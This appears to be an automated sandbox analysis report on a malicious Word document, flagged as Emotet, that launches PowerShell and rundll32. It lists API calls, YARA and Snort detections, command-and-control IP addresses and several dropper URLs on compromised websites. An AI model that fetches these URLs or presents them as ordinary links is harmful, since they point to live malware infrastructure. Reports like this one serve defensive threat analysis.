Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,	7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	7_2_1001175D

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_1000E372

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: powershell.exe, 00000005.00000002.2093002580.0000000000137000.00000004.00000020.sdmp

Binary or memory string: Sched.exe

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.71.148.58	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
216.218.207.98	unknown	United States	36103	CENTRALUTAHUS	true
202.187.222.40	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
184.66.18.83	unknown	Canada	6327	SHAWCA	true

Contacted Domains

Name	IP	Active
paulscomputing.com	216.218.207.98	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://paulscomputing.com/CraigsMagicSquare/H/	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://167.71.148.58:443/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: https://goldilockstraining.com/wp-includes/bftt/	Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/	Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P	Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/	Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/	Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: https://goldilockstraining.com/wp-includes/bftt/	Virustotal: Detection: 15%	Perma Link
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Virustotal: Detection: 16%	Perma Link
Source: http://paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Source: Doc.doc	Virustotal: Detection: 69%			Perma Link
Source: Doc.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002EA69B CryptDecodeObjectEx,

17_2_002EA69B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: paulscomputing.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49171 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://goldcoastoffice365.com/temp/X/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View	IP Address: 202.187.222.40 202.187.222.40

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View	ASN Name: SHAWCA SHAWCA

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E280B InternetReadFile,

17_2_002E280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: paulscomputing.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2094330849.0000000002CF2000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://jeffdahlke.com/css/bg4n3/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
